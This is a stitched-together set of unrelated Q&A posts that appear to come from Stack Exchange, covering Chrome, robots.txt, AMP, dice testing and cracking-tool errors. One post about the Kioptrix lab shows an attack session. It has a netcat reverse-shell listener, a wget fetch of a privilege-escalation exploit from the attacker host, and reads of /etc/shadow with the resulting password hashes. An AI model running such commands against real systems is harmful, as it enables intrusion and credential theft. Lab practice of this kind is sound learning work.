“View frame source” is suddenly an option on every website loaded with Chrome

I’m running Google Chrome Version 83.0.4103.61 (64-bit) on Windows 10, and I’ve suddenly noticed that never mind what website I visit, when I right click “View frame source” is an option.

This strikes me as odd, as that option is usually only available when you’re wanting to view the source code of an iFrame. Whether I click “View frame source” or “View page source” the source code and URL are the same.

But why does Chrome suddenly think that any website I load is being displayed in a frame? Is this cause for concern or am I just being paranoid?

hashcat: No hashes loaded

I’ve been trying Kioptrix: Level 1.1 (#2) and managed to get root access. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

wolf@linux:~$   nc -vklp 8080 listening on [any] 8080 ... 10.10.10.10: inverse host lookup failed: Unknown host connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795  id uid=48(apache) gid=48(apache) groups=48(apache)  cd /tmp wget http://10.10.10.99/privesc.c ls privesc.c gcc privesc.c -o privesc ./privesc  id uid=0(root) gid=0(root) groups=48(apache)  cat /etc/passwd cat /etc/shadow 

unshadow file = md5.txt

wolf@linux:~$   cat md5.txt  root:$  1$  FTpMLT88$  VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash john:$  1$  wk7kHI5I$  2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash harold:$  1$  7d.sVxgm$  3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash wolf@linux:~$    

However, I’m having a problem sending the unshadow file md5.txt to hashcat.

Any idea what’s wrong with this?

wolf@linux:~$   hashcat -m 0 -a 0 md5.txt rockyou.txt hashcat (v4.0.1) starting...  * Device #1: WARNING! Kernel exec timeout is not disabled.              This may cause "CL_OUT_OF_RESOURCES" or related errors.              To disable the timeout, see: https://hashcat.net/q/timeoutpatch nvmlDeviceGetFanSpeed(): Not Supported  OpenCL Platform #1: NVIDIA Corporation ======================================  Hashfile 'md5.txt' on line 1 (root:$  1$  FTpMLT88$  VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception Hashfile 'md5.txt' on line 2 (john:$  1$  wk7kHI5I$  2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception Hashfile 'md5.txt' on line 3 (harold:$  1$  7d.sVxgm$  3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception Parsing Hashes: 0/3 (0.00%)...No hashes loaded.  Started: Mon May 25 01:17:21 2020 Stopped: Mon May 25 01:17:21 2020 wolf@linux:~$    

Chrome: why is invalid certificate usage for resources loaded from localhost disabled?

In chrome there is a flag called: allow-insecure-localhost. As far as I can tell all it does is block localhost connection over tls if the certificate is self signed.

Why is this feature turned off by default? Does it affect regular users in any way (regular user = someone who is not developing something). Are there any serious cases of localhost connection being used malicious that could have been prevented by having this option enabled?

JohnTheRipper Error: No password hashes loaded (see FAQ)

I’m new to CTF challenges and came across a challenge where I’m required to crack the ZIP file using johntheripper with the rockyou.txt wordlist.

So for that, I tried both using sudo apt-get install john

And also using the GitHub repo of it and compiling it. But in both cases, I’m getting the same error

Using default input encoding: UTF-8

No password hashes loaded (see FAQ)

I’m using Ubuntu on my Windows 10 machine using Windows Subsystem for Linux.

So please help me out with the steps I need to follow to rectify the issue.

Is the Saltwater Float represented in this question a good way to test for loaded dice?

Recently a question has popped up in the comments of another question I’ve recently answered where a player has happened to roll three 18s and other high stats at a table with his dice, which could lead me to believe that he may be playing with a set of loaded or imbalanced dice.

Is the method presented in the youtube video How to check the balance of your d20 an accurate representation of a die’s weighting and balance and could it be used to properly and reliably test whether dice are loaded?

The video provides the following instructions for testing whether or not a die is balanced or not:

Ingredients:
1/4 cup of hot tap water (our water is a little hard)
6 tablespoons of Epsom salt

  1. Put the water in a small jam jar.
  2. Dump 2 tablespoons of Epsom salt into the water; put the lid on it and shake it till it dissolves.
  3. Dump 2 more tablespoons of Epsom salt into the water; put the lid on it and shake it till it dissolves.
  4. Add the last 2 tablespoons of Epsom salt; microwave the water on high for 30 seconds.
  5. Put the lid on it and shake it till it dissolves (use a dish towel to hold this, it is hot at this point).
  6. Once dissolved, set the closed container in a cold water bath until it cools back down to a little cooler than the room temperature.

Can robots.txt be used to prevent bots from seeing lazily loaded content?

Let’s say that googlebot is scraping https://example.com/page.

  • example.com has a robots.txt file that disallows /endpoint-for-lazy-loaded-content, but allows /page
  • /page lazy loads content using /endpoint-for-lazy-loaded-content (via fetch)

Does googlebot see the lazy loaded content?

Can I prevent my website from being loaded as AMP?

For some unknown reason, Facebook has decided that it wants to load my blog website as an AMP website, which only shows an excerpt and there’s no way for the user to see the entire article. The previous behaviour over the past five years has been that clicking the article thumbnail will just open the website normally. Just recently this changed to AMP version. I’ve made no changes to the website, so I don’t know why the sudden change is happening.

Regardless, now all of my past shares load as AMP instead of regular.

Is there a way to stop apps or websites from trying to load my content as AMP? My website’s not setup for AMP, nor do I want it to be.